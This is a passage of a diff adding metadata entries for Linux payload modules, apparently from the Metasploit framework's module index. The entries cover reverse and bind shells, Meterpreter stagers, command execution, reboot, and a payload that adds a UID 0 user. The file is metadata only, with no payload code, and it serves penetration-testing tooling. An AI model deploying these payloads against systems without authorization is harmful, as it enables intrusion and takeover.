"payload_linux/riscv64le/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/riscv64le/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "modexp", + "bcoles " + ], + "description": "Execute an arbitrary command", + "references": [ + "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", + "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" + ], + "platform": "Linux", + "arch": "riscv64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv64le/exec.rb", + "is_install_path": true, + "ref_name": "linux/riscv64le/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv64le/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/riscv64le/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "A very small shellcode for rebooting the system using\n the reboot syscall. This payload is sometimes helpful\n for testing purposes.", + "references": [], + "platform": "Linux", + "arch": "riscv64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv64le/reboot.rb", + "is_install_path": true, + "ref_name": "linux/riscv64le/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky", + "Geyslan G. Bem " + ], + "description": "Execute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/exec.rb", + "is_install_path": true, + "ref_name": "linux/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/meterpreter/bind_tcp": { + "name": "Linux Mettle x64, Bind TCP Stager", + "fullname": "payload/linux/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brent Cook ", + "ricky" + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_linux/x64/meterpreter/reverse_sctp": { + "name": "Linux Mettle x64, Reverse SCTP Stager", + "fullname": "payload/linux/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brent Cook ", + "RageLtMan " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-12-20 04:15:41 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_linux/x64/meterpreter/reverse_tcp": { + "name": "Linux Mettle x64, Reverse TCP Stager", + "fullname": "payload/linux/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_linux/x64/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/pingback_bind_tcp": { + "name": "Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/linux/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Accept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/pingback_reverse_tcp": { + "name": "Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/linux/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Connect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell/bind_tcp": { + "name": "Linux Command Shell, Bind TCP Stager", + "fullname": "payload/linux/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky" + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_linux/x64/shell/reverse_sctp": { + "name": "Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/linux/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky", + "RageLtMan " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-12-20 04:15:41 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_linux/x64/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_linux/x64/shell_bind_ipv6_tcp": { + "name": "Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/linux/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "epi " + ], + "description": "Listen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky" + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_bind_tcp_random_port": { + "name": "Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/linux/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Geyslan G. Bem " + ], + "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mak" + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_reverse_ipv6_tcp": { + "name": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/linux/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "epi " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky" + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/adduser": { + "name": "Linux Add User", + "fullname": "payload/linux/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Create a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/adduser.rb", + "is_install_path": true, + "ref_name": "linux/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/chmod": { + "name": "Linux Chmod", + "fullname": "payload/linux/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Runs chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/chmod.rb", + "is_install_path": true, + "ref_name": "linux/x86/chmod", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Execute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/exec.rb", + "is_install_path": true, + "ref_name": "linux/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/meterpreter/bind_ipv6_tcp": { + "name": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_linux/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_linux/x86/meterpreter/bind_nonx_tcp": { + "name": "Linux Mettle x86, Bind TCP Stager", + "fullname": "payload/linux/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_linux/x86/meterpreter/bind_tcp": { + "name": "Linux Mettle x86, Bind TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_linux/x86/meterpreter/bind_tcp_uuid": { + "name": "Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_linux/x86/meterpreter/find_tag": { + "name": "Linux Mettle x86, Find Tag Stager", + "fullname": "payload/linux/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape " + ], + "description": "Inject the mettle server payload (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_linux/x86/meterpreter/reverse_ipv6_tcp": { + "name": "Linux Mettle x86, Reverse TCP Stager (IPv6)", + "fullname": "payload/linux/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "kris katterjohn " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_linux/x86/meterpreter/reverse_nonx_tcp": { + "name": "Linux Mettle x86, Reverse TCP Stager", + "fullname": "payload/linux/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_linux/x86/meterpreter/reverse_tcp": { + "name": "Linux Mettle x86, Reverse TCP Stager", + "fullname": "payload/linux/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_linux/x86/meterpreter/reverse_tcp_uuid": { + "name": "Linux Mettle x86, Reverse TCP Stager", + "fullname": "payload/linux/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_linux/x86/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 